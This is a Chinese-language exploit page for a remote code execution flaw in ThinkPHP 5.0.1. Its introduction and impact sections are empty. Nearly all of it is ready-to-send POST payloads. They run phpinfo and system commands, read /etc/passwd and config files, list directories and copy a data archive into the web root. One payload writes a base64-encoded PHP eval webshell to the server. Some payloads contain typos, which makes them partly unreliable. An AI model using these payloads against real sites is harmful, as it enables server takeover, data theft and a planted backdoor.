Thinkphp_5.0.1

# Thinkphp 5.0.1

==============

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

### 1、判断是否存在漏洞

#### poc1

http://wwww.com/public

s=phpinfo()&_method=__construct&filter=assert
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[0]=phpinfo&get[1]=1

#### poc2

http:/xxxx.com/?s=index/index/index

s=ipconfig&_mehthod=__construct$method=&filter[]=system

### 2、深入利用

使用post提交

#### 1、使用assert函数

s=phpinfo()&_method=__construct&filter=assert

#### 2、include函数,可以根据此函数查看一些文件及其配置

s=include(“/etc/passwd”)&_method=__construct&filter=assert

#### 3、file\_put\_contents函数,可以直接写入文件

s=file_put_contents(‘/data/wwwroot/www.0-sec.org/application/index/test.php’,base64_decode(‘PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4’))&_method=__construct&filter=assert

#### 4、读取文件

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../application/.htaccess
s=include(“../application/.htaccess”)&_method=__construct&filter=assert

//ps:如果不加.. 请加上完整路径

#### 5、var\_dump函数,可以查看该路径下的文件,文件夹

s=var_dump(scandir(‘../application/’))&_method=__construct&filter=assert

#### 6、复制文件

s=copy(“/data/wwwroot/data.tar”, “/data/wwwroot/www.0-sec.org/public/data.tar”)&_method=__construct&filter=asser

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容